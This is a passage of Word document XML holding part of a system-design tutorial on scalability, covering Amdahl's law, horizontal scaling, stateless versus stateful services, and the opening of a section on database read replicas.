    <w:p w14:paraId="351E2C95" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A12C5D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Speedup = 1 / (S + (1-S)/N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2FDCA0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Where S = fraction of work that's inherently serial, N = number of processors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2FD517" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>If 5% of your workload is serial (S=0.05):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480ED402" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>10 cores → 6.9x speedup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE825D7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>100 cores → 16.8x speedup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1400B680" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>1000 cores → 19.6x speedup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A65F6AE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Infinite cores → maximum 20x speedup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B57B88" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This means:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> No matter how powerful your single machine, the serial portions of your workload cap your gains. This is why vertical scaling has diminishing returns even before hitting hardware limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150CFDF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04437216" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it means:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Add more machines (nodes) to distribute the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C61D4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C1BF76" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Instead of one server handling 10,000 RPS, ten servers each handle 1,000 RPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DAC33F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Data is partitioned across machines so each holds a subset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A811644" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A coordination layer (load balancer, router, coordinator) distributes work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653FED87" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60884CCA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Near-linear scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (in theory): 2x machines → 2x throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6C363" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No hardware ceiling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> You can add thousands of commodity machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B29D49" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Built-in redundancy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> If one machine dies, others continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48B7B5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost-effective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Many cheap commodity machines often cheaper than one massive machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BC91D2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenges (the hard part):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7432D5EA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Where does the state live? If each request can go to any server, how does server B know what server A just wrote?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D456DCA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Distributed state means potential for stale reads, write conflicts, split-brain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B91BAEB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Machines must communicate. Network is 1000x slower than local memory access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCAFB9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operational complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Deploying, monitoring, debugging 100 machines vs 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE2AB1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Coordination overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Distributed locks, leader election, consensus protocols all add latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A8A404" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The reality:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Most production systems use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>combination</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — scale vertically to a reasonable per-node capacity, then scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA8ED84" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="610D1FC5">
          <v:rect id="_x0000_i2288" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ACC668" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Stateless vs. Stateful Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63445B5F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Stateless Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50723250" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What makes a service stateless:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480108FE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The server holds no client-specific data between requests. Every request contains all information needed to process it (via tokens, headers, or by querying external state stores).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC2E19F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters for scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51567970" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Any instance can handle any request → perfect load distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D8E02" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adding instances immediately adds capacity. No data migration needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BDD823" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Instance failure loses no data. Replacement is trivial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219A8D5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works behind the scenes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6EBF5A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User authenticates → receives a JWT token (self-contained, signed, contains user identity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAFE6F2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Every subsequent request carries the JWT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B8026" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Any server can validate the JWT independently (using the shared public key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAFE80E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server queries the database/cache for any needed state, processes request, responds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4366280B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The externalized state pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B085C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Session data, user state, shopping carts — all moved to an external store (Redis, Memcached, database). The application servers become pure compute nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C8D82" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tradeoff:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every request now needs to fetch state from an external store (network round-trip). This adds latency. Mitigated by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736D9721" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Keeping the state store in the same datacenter (&lt; 1ms round-trip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4BC433" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Using in-memory stores like Redis (sub-millisecond reads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB2B211" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Embedding state in the request itself (JWT, cookies — but size-limited).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21661257" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Stateful Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA571D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When you can't avoid state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CE6A0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Database servers (the data must live somewhere).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033861F8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>WebSocket connections (persistent connection = server-specific state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25131267" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>In-memory caches (the cache IS the state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B5D2CF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Stream processors (maintaining aggregation windows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4565346D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling stateful services is fundamentally harder because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569922A5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>You can't freely move connections/data between nodes without disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD3071B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adding a node requires rebalancing existing data (expensive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C4779D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Node failure means state loss unless replicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012DB5F4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA051E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partitioning/Sharding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Split state across nodes by key. Each node owns a subset. Scale by adding shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02932193" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Minimize data movement when adding/removing nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617BC2E4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sticky sessions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Route a user to the same node (limits load distribution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F09166" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replicated state machines:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every node has full state (limits data size, expensive writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06EE77" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="4F88A135">
          <v:rect id="_x0000_i2289" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F72119" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Database Scalability — The Hardest Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD9C12" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Read Replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1905CE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Your database handles 10,000 reads/sec and 500 writes/sec. Reads are the bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A006A35" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How read replicas work internally:</w:t>
      </w:r>
    </w:p>
